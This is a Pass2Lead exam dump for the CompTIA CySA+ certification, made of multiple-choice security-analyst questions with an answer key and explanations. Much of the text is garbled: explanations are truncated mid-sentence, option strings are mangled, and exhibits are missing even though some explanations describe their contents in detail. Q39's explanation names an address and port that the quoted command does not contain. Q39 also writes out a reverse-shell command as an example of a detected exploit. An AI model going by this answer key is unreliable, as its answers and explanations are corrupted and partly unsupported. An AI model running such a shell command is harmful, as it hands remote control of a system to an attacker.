100% Real IT Exam Q&As.

Easily Pass with a High Score.

Copyright © Pass2Lead.com, All Rights Reserved.

All our exam practice questions and answers are only for our product buyers to get prepared for their
coming certification examinations. Any unauthorized sharing is forbidden. It may cause the suspending
of ones account, membership and product update if there is a violation of this rule.
 Join Our Telegram for Exclusive Services!

Dear customers, join our Telegram for personalized pre-sales inquiries or

post-sales support. Scan the QR code or click here to experience our

dedicated services!

Join us, and you'll enjoy:

• Instant Responses: Our customer service team is always on

standby, ready to answer any questions you may have.

• Professional Support: No matter what product issues you

encounter, our experts will provide professional solutions.

• Latest Updates: Be the first to get updates on our products and

exclusive offers.

Scan the QR code and join us to stay on track.

Join our Telegram family now! Let us help you easily solve all your problems

and enjoy a worry-free shopping experience.

https://t.me/certvip
Vendor: CompTIA

Exam Code: CS0-003

Exam Name: CompTIA Cybersecurity Analyst (CySA+)

Q&As: 427 (There are 6 parts in the dump, 427 questions in total.)
Exam A

QUESTION 1
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege
escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the
following CVE metrics would be most accurate for this zero-day threat?

A. CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H: K/A: L

B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

Correct Answer: A
Explanation

Explanation/Reference:
This answer matches the description of the zero-day threat. The attack vector is network (AV:N), the attack
complexity is low (AC:L), no privileges are required (PR:N), no user interaction is required (UI:N), the
scope is unchanged (S:U), the confidentiality and integrity impacts are high (C:H/I:H), and the availability
impact is low (A:L). Official https://nvd.nist.gov/vuln-metrics/cvss

QUESTION 2
Which of the following tools would work best to prevent the exposure of PII outside of an organization?

A. PAM
B. IDS
C. PKI
D. DLP

Correct Answer: D
Explanation

Explanation/Reference:
Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by
monitoring, detecting, and blocking sensitive data in motion, in use, or at rest.

QUESTION 3
An organization conducted a web application vulnerability assessment against the corporate website, and
the following output was observed:
Which of the following tuning recommendations should the security analyst share?

A. Set an HttpOnlvflaq to force communication by HTTPS

B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header

Correct Answer: B
Explanation

Explanation/Reference:
The output shows that the web application is vulnerable to clickjacking attacks, which allow an attacker to
overlay a hidden frame on top of a legitimate page and trick users into clicking on malicious links. Blocking
requests without an X- Frame-Options header can prevent this attack by instructing the browser to not
display the page within a frame.

QUESTION 4
Which of the following items should be included in a vulnerability scan report? (Choose two.)

A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan

Correct Answer: DE
Explanation

Explanation/Reference:
A vulnerability scan report should include information about the affected hosts, such as their IP addresses,
hostnames, operating systems, and services. It should also include a risk score for each vulnerability,
which indicates the severity and potential impact of the vulnerability on the host and the organization.
Official https://www.first.org/cvss/

QUESTION 5
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the
industry was happening approximately 45 days after a patch was released. Which of the following would
best protect this organization?

A. A mean time to remediate of 30 days

B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing

Correct Answer: A
Explanation

Explanation/Reference:
A mean time to remediate (MTTR) is a metric that measures how long it takes to fix a vulnerability after it is
discovered. A MTTR of 30 days would best protect the organization from the new attacks that are exploited
45 days after a patch is released, as it would ensure that the vulnerabilities are fixed before they are
exploited

QUESTION 6
A security analyst recently joined the team and is trying to determine which scripting language is being
used in a production script to determine if it is malicious. Given the following script:

foreach ($user in Get-Content .\this.txt)

{
Get-ADUser $user -Properties primaryGroupID |select-object pr:
Add-ADGroupMember "Domain Users" -Members $user
Set-ADUser $user -Replace 0(primaryGroupID=513)
}

Which of the following scripting languages was used in the script?

A. PowerShel
B. Ruby
C. Python
D. Shell script

Correct Answer: A
Explanation

Explanation/Reference:
The script uses PowerShell syntax, such as cmdlets, parameters, variables, and comments. PowerShell is
a scripting language that can be used to automate tasks and manage systems.

QUESTION 7
A company's user accounts have been compromised. Users are also reporting that the company's internal
portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of
the following most likely describes the observed activity?

A. There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access
B. An on-path attack is being performed by someone with internal access that forces users into port 80
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
D. An error was caused by BGP due to new rules applied over the company's internal routers

Correct Answer: B
Explanation
Explanation/Reference:
An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network
traffic between two parties. In this case, someone with internal access may be performing an on-path
attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is
used for HTTPS communication. This would allow the attacker to compromise the user accounts and
access the company’s internal portal.

QUESTION 8
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security
policies are shown below:

Security Policy 1006: Vulnerability Management

1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the
remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the Company shall
prioritize confidentiality of data over availability of systems and data.
3. The Company shall prioritize patching of publicly available systems and services over patching of
internally available system.

According to the security policy, which of the following vulnerabilities should be the highest priority to
patch?

A. Name: THOR HAMMER

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
internal System
B. Name: CAP.SHIELD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System

Correct Answer: B
Explanation

Explanation/Reference:
Based on the security policy and the CVSSv3.1 Base Scores, vulnerability B (CAP.SHIELD) with a high
impact on confidentiality should be the highest priority to patch. It is an externally accessible system, and
since confidentiality takes precedence over availability, it should be addressed before other vulnerabilities.

QUESTION 9
Which of the following will most likely ensure that mission-critical services are available in the event of an
incident?

A. Business continuity plan

B. Vulnerability management plan
C. Disaster recovery plan
D. Asset management plan

Correct Answer: C
Explanation

QUESTION 10
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several
high-risk cloud applications are used that increase the risk to the organization. Which of the following
solutions will assist in reducing the risk?
A. Deploy a CASB and enable policy enforcement
B. Configure MFA with strict access
C. Deploy an API gateway
D. Enable SSO to the cloud applications

Correct Answer: A
Explanation

Explanation/Reference:
A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise
by providing visibility and control over cloud applications and services. A CASB can enable policy
enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules,
encrypting sensitive data, and detecting anomalous user behavior.

QUESTION 11
An incident response team receives an alert to start an investigation of an internet outage. The outage is
preventing all users in multiple locations from accessing external SaaS resources. The team determines
the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A. CDN
B. Vulnerability scanner
C. DNS
D. Web server

Correct Answer: C
Explanation

Explanation/Reference:
A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a "th a large
volume of traffic from multiple sources. A common technique for launching a DDoS attack is to
compromise DNS servers, which are responsible for resolving domain names into IP addresses. By
flooding DNS servers with malicious requests, attackers can disrupt the normal functioning of the internet
and prevent users from accessing external SaaS resources. Official https://www.eccouncil.org/
cybersecurity-exchange/threatintelligence/ cyber-kill-chain-seven-steps-cyberattack/

QUESTION 12
A malicious actor has gained access to an internal network by means of social engineering. The actor
does not want to lose access in order to continue the attack. Which of the following best describes the
current stage of the Cyber Kill Chain that the threat actor is currently operating in?

A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation

Correct Answer: D
Explanation

Explanation/Reference:
The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to
actions on objectives. The exploitation stage is where attackers take advantage of the vulnerabilities they
have discovered in previous stages to further infiltrate a" objectives. In this case, the malicious actor has
gained access to an internal network by means of social engineering and does not want to lose access in
order to continue the attack. This indicates that the actor is in the exploitation stage of the Cyber Kill Chain.
Official Reference:
https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

QUESTION 13
An analyst finds that an IP address outside of the company network that is being used to run network and
vulnerability scans across external-facing assets. Which of the following steps of an attack framework is
the analyst witnessing?

A. Exploitation
B. Reconnaissance
C. Command and control
D. Actions on objectives

Correct Answer: B
Explanation

Explanation/Reference:
Reconnaissance is the first stage in the Cyber Kill Chain and involves researching potential targets before
carrying out any penetration testing. The reconnaissance stage may include identifying potential targets,
finding their vulnerabilities, discovering which third parties are connected to them (and what data they can
access), and exploring existing entry points as well as finding new ones. Reconnaissance can take place
both online and offline. In this case, an analyst finds that an IP address outside of the company network is
being used to run network and vulnerability scans across external-facing assets. This indicates that the
analyst is witnessing reconnaissance activity by an attacker. Official https:// www.lockheedmartin.com/en-
us/capabilities/cyber/cyber-killchain.html

QUESTION 14
An incident response analyst notices multiple emails traversing the network that target only the
administrators of the company. The email contains a concealed URL that leads to an unknown website in
another country. Which of the following best describes what is happening? (Choose two.)

A. Beaconinq
B. Domain Name System hijacking
C. Social engineering attack
D. On-path attack
E. Obfuscated links
F. Address Resolution Protocol poisoning

Correct Answer: CE
Explanation

Explanation/Reference:
A social engineering attack is a type of cyberattack that relies on manipulating human psychology rather
than exploiting technical vulnerabilities. A social engineering attack may involve deceiving, persuading, or
coercing users into performing actions that benefit the attacker, such as clicking on malicious links,
divulging sensitive information, or granting access to restricted resources. An obfuscated link is a link that
has been disguised or altered to hide its true destination or purpose. Obfuscated links are often used by
attackers to trick users into visiting malicious websites or downloading malware. In this case, an incident
response analyst notices multiple emails traversing the network that target only the administrators of the
company. The email contains a concealed URL that leads to an unknown website in another country. This
indicates that the analyst is witnessing a social engineering attack using obfuscated links.

QUESTION 15
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application.
Which of the following recommendations would best mitigate this problem if applied along the SDLC
phase?

A. Conduct regular red team exercises over the application in production

B. Ensure that all implemented coding libraries are regularly checked
C. Use application security scanning as part of the pipeline for the CI/CDflow
D. Implement proper input validation for any data entry form

Correct Answer: C
Explanation

Explanation/Reference:
Application security scanning is a process that involves testing and analyzing applications for security
vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure
configuration. Application security scanning can help identify and fix security issues before they become
exploitable by attackers. Using application security scanning as part of the pipeline for the continuous
integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same
vulnerabilities in a critical application during security scanning. This is because application security
scanning can be integrated into the development lifecycle and performed automatically and frequently as
part of the CI/CD process.

QUESTION 16
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The
analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window.
However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does
not have access to. Which of the following inhibitors to remediation do these systems and associated
vulnerabilities best represent?

A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows

Correct Answer: A
Explanation

Explanation/Reference:
Proprietary systems are systems that are owned and controlled by a specific vendor or manufacturer, and
that use proprietary standards or protocols that are not compatible with other systems. Proprietary systems
can pose a challenge for vulnerability management, as they may not allow users to access or modify their
configuration, update their software, or patch their vulnerabilities. In this case, two of the critical systems
cannot be upgraded due to a vendor appliance that the company does not have access to. This indicates
that these systems and associated vulnerabilities are examples of proprietary systems as inhibitors to
remediation

QUESTION 17
The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

A. An output of characters > and " as the parameters used m the attempt
B. The vulnerable parameter ID hccp://l72.31.15.2.php?id-2 and unfiltered characters returned
C. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
D. The vulnerable parameter and characters > and " with a reflected XSS attempt

Correct Answer: D
Explanation

Explanation/Reference:
A cross-site scripting (XSS) attack is a type of web application attack that injects malicious code into a web
page that is then executed by the browser of a victim user. A reflected XSS attack is a type of XSS attack
where the malicious code is embedded in a URL or a form parameter that is sent to the web server and
then reflected back t" case, the Nmap scan shows that the web server is vulnerable to a reflected XSS
attack, as it returns the characters > and " without any filtering or encoding. The vulnerable parameter is id
in the URL http:/.31.15.2.php?id=2.

QUESTION 18
Which of the following is the best action to take after the conclusion of a security incident to improve
incident response in the future?

A. Develop a call tree to inform impacted users

B. Schedule a review with all teams to discuss what occurred
C. Create an executive summary to update company leadership
D. Review regulatory compliance with public relations for official notification

Correct Answer: B
Explanation

Explanation/Reference:
One of the best actions to take after the conclusion of a security incident to improve incident response in
the future is to schedule a review with all teams to discuss what occurred, what went well, what went
wrong, and what can be improved. This review is also known as a lessons learned session or an after-
action report. The purpose of this review is to identify the root causes of the incident, evaluate the
effectiveness of the incident response process, document any gaps or weaknesses in the security controls,
and recommend corrective actions or preventive measures for future incidents. Official https://
www.eccouncil.org/cybersecurity-exchange/threatintelligence/ cyber-kill-chain-seven-steps-cyberattack/

QUESTION 19
A security analyst received a malicious binary file to analyze. Which of the following is the best technique
to perform the analysis?

A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing

Correct Answer: C
Explanation

Explanation/Reference:
Reverse engineering is a technique that involves analyzing a binary file to understand its structure,
functionality, and behavior. Reverse engineering can help security analysts perform malware analysis,
vulnerability research, exploit development, and software debugging. Reverse engineering can be done
using various tools, such as disassemblers, debuggers, decompilers, and hex editors.

QUESTION 20
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical
evidence for further investigation. Which of the following pieces of data should be collected first in order to
preserve sensitive information before isolating the server?

A. Hard disk
B. Primary boot partition
C. Malicious tiles
D. Routing table
E. Static IP address

Correct Answer: A
Explanation

Explanation/Reference:
The hard disk is the piece of data that should be collected first in order to preserve sensitive information
before isolating the server. The hard disk contains all the files and data stored on the server, which may
include evidence of malicious activity, such as malware installation, data exfiltration, or configuration
changes. The hard disk should be collected using proper forensic techniques, such as creating an image
or a copy of the disk and maintaining its integrity using hashing algorithms.

QUESTION 21
Which of the following security operations tasks are ideal for automation?

A. Suspicious file analysis:

Look for suspicious-looking graphics in a folder.
Create subfolders in the original folder based on category of graphics found.
Move the suspicious graphics to the appropriate subfolder
B. Firewall IoC block actions:
Examine the firewall logs for IoCs from the most recently published zero-day exploit
Take mitigating actions in the firewall to block the behavior found in the logs
Follow up on any false positives that were caused by the block rules
C. Security application user errors:
Search the error logs for signs of users having trouble with the security application
Look up the user's phone number
Call the user to help with any questions about using the application
D. Email header analysis:
Check the email header for a phishing confidence metric greater than or equal to five
Add the domain of sender to the block list
Move the email to quarantine

Correct Answer: D
Explanation

Explanation/Reference:
Email header analysis is one of the security operations tasks that are ideal for automation. Email header
analysis involves checking the email header for various indicators of phishing or spamming attempts, such
as sender address spoofing, mismatched domains, suspicious subject lines, or phishing confidence
metrics. Email header analysis can be automated using tools or scripts that can parse and analyze email
headers and take appropriate actions based on predefined rules or thresholds

QUESTION 22
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of
the following groups should the organization report the breach to?

A. PCI Security Standards Council

B. Local law enforcement
C. Federal law enforcement
D. Card issuer

Correct Answer: D
Explanation

Explanation/Reference:
Under the terms of PCI DSS, an organization that has experienced a breach of customer transactions
should report the breach to the card issuer. The card issuer is the financial institution that issues the
payment cards to the customers and that is responsible for authorizing and processing the transactions.
The card issuer may have specific reporting requirements and procedures for the organization to follow in
the event of a breach. The organization should also notify other parties that may be affected by the breach,
such as customers, law enforcement, or regulators, depending on the nature and scope of the breach.
Official https://www.pcisecuritystandards.org/

QUESTION 23
Which of the following is the best metric for an organization to focus on given recent investments in SIEM,
SOAR, and a ticketing system?

A. Mean time to detect

B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts

Correct Answer: A
Explanation

Explanation/Reference:
Mean time to detect (MTTD) is the best metric for an organization to focus on given recent investments in
SIEM, SOAR, and a ticketing system. MTTD is a metric that measures how long it takes to detect a
security incident or threat from the time it occurs. MTTD can be improved by using tools and processes
that can collect, correlate, analyze, and alert on security data from various sources. SIEM, SOAR, and
ticketing systems are examples of such tools and processes that can help reduce MTTD and enhance
security operations.
Official https://www.eccouncil.org/cybersecurityexchange/threat-intelligence/cyber-kill-chain-seven-steps-
cyberattack

QUESTION 24
A company is implementing a vulnerability management program and moving from an on-premises
environment to a hybrid IaaS cloud environment. Which of the following implications should be considered
on the new hybrid environment?

A. The current scanners should be migrated to the cloud

B. Cloud-specific misconfigurations may not be detected by the current scanners
C. Existing vulnerability scanners cannot scan laaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud

Correct Answer: B
Explanation

Explanation/Reference:
Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration
of cloud resources, such as storage buckets, databases, virtual machines, or containers. Cloud-specific
misconfigurations may not be detected by the current scanners that are designed for on-premises
environments, as they may not have the visibility or access to the cloud resources or the "re, one of the
implications that should be considered on the new hybrid environment is that cloud-specific
misconfigurations may not be detected by the current scanners.

QUESTION 25
A security alert was triggered when an end user tried to access a website that is not allowed per
organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the
authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation,
to build the case for the investigation. Which of the following is the best way to ensure that the investigation
complies with HR or privacy policies?

A. Create a timeline of events detailinq the date stamps, user account hostname and IP information
associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information Password protect the
evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access will
not be able to easily identity the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional

Correct Answer: B
Explanation

Explanation/Reference:
The best way to ensure that the investigation complies with HR or privacy policies is to ensure that the
case details do not reflect any user-identifiable information, such as name, email address, phone number,
or employee ID. This can help protect the privacy and confidentiality of the user and prevent any potential
discrimination or retaliation. Additionally, password protecting the evidence and restricting access to
personnel related to the investigation can help preserve the integrity and security of the evidence and
prevent any unauthorized or accidental disclosure or modification.
QUESTION 26
Which of the following is the first step that should be performed when establishing a disaster recovery
plan?

A. Agree on the goals and objectives of the plan

B. Determine the site to be used during a disaster
C. Demonstrate adherence to a standard disaster recovery process
D. Identity applications to be run during a disaster

Correct Answer: A
Explanation

Explanation/Reference:
The first step that should be performed when establishing a disaster recovery plan is to agree on the goals
and objectives of the plan. The goals and objectives of the plan should define what the plan aims to
achieve, such as minimizing downtime, restoring critical functions, ensuring data integrity, or meeting
compliance requirements. The goals and objectives of the plan should also be aligned with the business
needs and priorities of the organization and be measurable and achievable.

QUESTION 27
A technician identifies a vulnerability on a server and applies a software patch. Which of the following
should be the next step in the remediation process?

A. Testing
B. Implementation
C. Validation
D. Rollback

Correct Answer: C
Explanation

Explanation/Reference:
The next step in the remediation process after applying a software patch is validation. Validation is a
process that involves verifying that the patch has been successfully applied, that it has fixed the
vulnerability, and that it has not caused any adverse effects on the system or application functionality or
performance. Validation can be done using various methods, such as scanning, testing, monitoring, or
auditing.

QUESTION 28
The analyst reviews the following endpoint log entry:

Which of the following has occurred?

A. Registry change
B. Rename computer
C. New account introduced
D. Privilege escalation
Correct Answer: C
Explanation

Explanation/Reference:
The endpoint log entry shows that a new account named “admin” has been created on a Windows system
with a local group membership of “Administrators”.
This indicates that a new account has been introduced on the system with administrative privileges. This
could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who
has compromised the system.

QUESTION 29
A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a
SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the
security program did?

A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass

Correct Answer: D
Explanation

Explanation/Reference:
A single pane of glass is a term that describes a unified view or interface that integrates multiple tools or
data sources into one dashboard or console. A single pane of glass can help improve security operations
by providing visibility, correlation, analysis, and alerting capabilities across various security controls and
systems. A single pane of glass can also help reduce complexity, improve efficiency, and enhance
decision making for security analysts. In this case, a security program was able to achieve a 30%
improvement in MTTR by integrating security controls into a SIEM, which provides a single pane of glass
for security operations. Official Reference:
https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-
cyberattack

QUESTION 30
Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing
a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which
devices were operating in the environment. Given the following output:
Which of the following choices should the analyst look at first?
A. wh4dc-748gy.lan (192.168.86.152)
B. lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)

Correct Answer: E
Explanation

Explanation/Reference:
The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on
the network. P4wnP1 ALOA is a tool that can be used to create a malicious USB device that can perform
various attacks, such as keystroke injection, network sniffing, man-in-the-middle, or backdoor creation. The
presence of a device with this name on the network could indicate that an attacker has plugged in a
malicious USB device to a system and gained access to the network. Official https://github.com/mame82/
P4wnP1_aloa

QUESTION 31
When starting an investigation, which of the following must be done first?

A. Notify law enforcement

B. Secure the scene
C. Seize all related evidence
D. Interview the witnesses

Correct Answer: B
Explanation

Explanation/Reference:
The first thing that must be done when starting an investigation is to secure the scene. Securing the scene
involves isolating and protecting the area where the incident occurred, as well as any potential evidence or
witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence,
as well as any interference or obstruction of the investigation.
QUESTION 32
Which of the following describes how a CSIRT lead determines who should be communicated with and
when during a security incident?

A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any t me
D. Subject matter experts on the team should communicate with others within the specified area of
expertise

Correct Answer: A
Explanation

Explanation/Reference:
The incident response policy or plan is a document that defines the roles and responsibilities, procedures
and processes, communication and escalation protocols, and reporting and documentation requirements
for handling security incidents. The lead should review what is documented in the incident response policy
or plan to determine who should be communicated with and when during a security incident, as well as
what information should be shared and how. The incident response policy or plan should also be aligned
with the organizational policies and legal obligations regarding incident notification and disclosure.

QUESTION 33
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the
organization. Which of the following will produce the data needed for the briefing?

A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists

Correct Answer: B
Explanation

Explanation/Reference:
Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has been
compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs, file
hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be used to
detect, analyze, and respond to security incidents, as well as to share threat intelligence with other
organizations or authorities. IoCs can produce the data needed for an executive briefing on possible
threats to the organization, as they can provide information on the source, nature, scope, impact, and
mitigation of the threats.

QUESTION 34
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the
header to a known-malicious IP in another country. Which of the following describes what the analyst has
noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal

Correct Answer: A
Explanation

QUESTION 35
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a
potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see
there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not
showing the packets containing the file transfer itself. Which of the following can the analyst perform to see
the entire contents of the downloaded files?

A. Change the display filter to f cp. accive. pore

B. Change the display filter to tcg.port=20
C. Change the display filter to f cp-daca and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option

Correct Answer: C
Explanation

Explanation/Reference:
The best way to see the entire contents of the downloaded files in Wireshark is to change the display filter
to ftp-data and follow the TCP streams. FTP-data is a protocol that is used to transfer files between an FTP
client and server using TCP port 20. By filtering for ftp-data packets and following the TCP streams, the
analyst can see the actual file data that was transferred during the FTP session

QUESTION 36
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability
report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which
of the following documents should the SOC manager review to ensure the team is meeting the appropriate
contractual obligations for the customer?

A. SLA
B. MOU
C. NDA
D. Limitation of liability

Correct Answer: A
Explanation

Explanation/Reference:
SLA stands for service level agreement, which is a contract or document that defines the expectations and
obligations between a service provider and a customer regarding the quality, availability, performance, or
scope of a service. An SLA may also specify the metrics, penalties, or remedies for measuring or ensuring
compliance with the agreed service levels. An SLA can help the SOC manager review if the team is
meeting the appropriate contractual obligations for the customer, such as response time, resolution time,
reporting frequency, or communication channels.

QUESTION 37
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish
communication with a successfully exploited target?

A. Command and control

B. Actions on objectives
C. Exploitation
D. Delivery

Correct Answer: A
Explanation

Explanation/Reference:
Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to
establish communication with a successfully exploited target. C2 enables the adversary to remotely control
or manipulate the target system or network using various methods, such as malware callbacks, backdoors,
botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute
commands, deliver payloads, or spread to other systems or networks.

QUESTION 38
A company that has a geographically diverse workforce and dynamic IPs wants to implement a
vulnerability scanning method with reduced network traffic. Which of the following would best meet this
requirement?

A. External
B. Agent-based
C. Non-credentialed
D. Credentialed

Correct Answer: B
Explanation

Explanation/Reference:
Agent-based vulnerability scanning is a method that involves installing software agents on the target
systems or networks that can perform local scans and report the results to a central server or console.
Agent-based vulnerability scanning can reduce network traffic, as the scans are performed locally and only
the results are transmitted over the network. Agent-based vulnerability scanning can also provide more
accurate and up-to-date results, as the agents can scan continuously or ondemand, regardless of the
system or network status or location.

QUESTION 39
A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp.1.1.11 0>$l

Which of the following is being attempted?

A. RCE
B. Reverse shell
C. XSS
D. SQL injection

Correct Answer: B
Explanation

Explanation/Reference:
A reverse shell is a type of shell access that allows a remote user to execute commands on a target
system or network by reversing the normal direction of communication. A reverse shell is usually created
by running a malicious script or program on the target system that connects back to the " a shell session. A
reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an
outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit
attempt containing the following command:
sh -i >& /dev/udp.1.1.11 0>$l
This command is a shell script that creates a reverse shell connection from the target system to the "P
address 10.1.1.1 and port 4821 using UDP protocol.

QUESTION 40
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available
exploit being used to deliver ransomware. Which of the following factors would an analyst most likely
communicate as the reason for this escalation?

A. Scope
B. Weaponization
C. CVSS
D. Asset value

Correct Answer: B
Explanation

Explanation/Reference:
Weaponization is a factor that describes how an adversary develops or acquires an exploit or payload that
can take advantage of a vulnerability and deliver a malicious effect. Weaponization can increase the
severity or impact of a vulnerability, as it makes it easier or more likely for an attacker to exploit it
successfully and cause damage or harm. Weaponization can also indicate the level of sophistication or
motivation of an attacker, as well as the availability or popularity of an exploit or payload in the cyber threat
landscape. In this case, an older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to
a widely available exploit being used to deliver ransomware. This indicates that weaponization was the
reason for this escalation.

QUESTION 41
An analyst is reviewing a vulnerability report for a server environment with the following entries:
Which of the following systems should be prioritized for patching first?

A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228

Correct Answer: D
Explanation

Explanation/Reference:
The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and
severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report,
this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical
vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017- 0144
(EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities
that can allow an attacker to compromise the system without any user interaction or authentication. These
vulnerabilities pose a high risk to the system and should be patched as soon as possible.

QUESTION 42
A company is in the process of implementing a vulnerability management program, and there are concerns
about granting the security team access to sensitive data. Which of the following scanning methods can be
implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A. Credentialed network scanning

B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 43
A security analyst is trying to identify anomalies on the network routing. Which of the following functions
can the analyst use on a shell script to achieve the objective most accurately?

A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }

B. function x() { info=$(ping -c 1 $""o "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-a" ').origin.asn.cymru.com TXT
+short) && echo "$1 | $info" }
D. function x() { info=$(tracerou""$1 | $info" }

Correct Answer: C
Explanation

Explanation/Reference:
The function that can be used on a shell script to identify anomalies on the network routing most accurately
is:
function x() { info=(dig(dig -x $1 | grep PTR | tail -n 1 | awk" " " }
This function takes an IP address as an argument and performs two DNS lookups using the dig command.
The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with
the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system
number (ASN) and other information related to the IP address. The function then prints the IP address and
the ASN information, which can help identify any routing anomalies or inconsistencies

QUESTION 44
There are several reports of sensitive information being disclosed via file sharing services. The company
would like to improve its security posture against this threat. Which of the following security controls would
best support the company in this scenario?

A. Implement step-up authentication for administrators

B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management

Correct Answer: B
Explanation

Explanation/Reference:
The best security control to implement against sensitive information being disclosed via file sharing
services is to improve employee training and awareness. Employee training and awareness can help
educate employees on the risks and consequences of using file sharing services for sensitive information,
as well as the policies and procedures for handling such information securely and appropriately. Employee
training and awareness can also help foster a security culture and encourage employees to report any
incidents or violations of information security.

QUESTION 45
Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding
a recent incident involving a cybersecurity breach?

A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
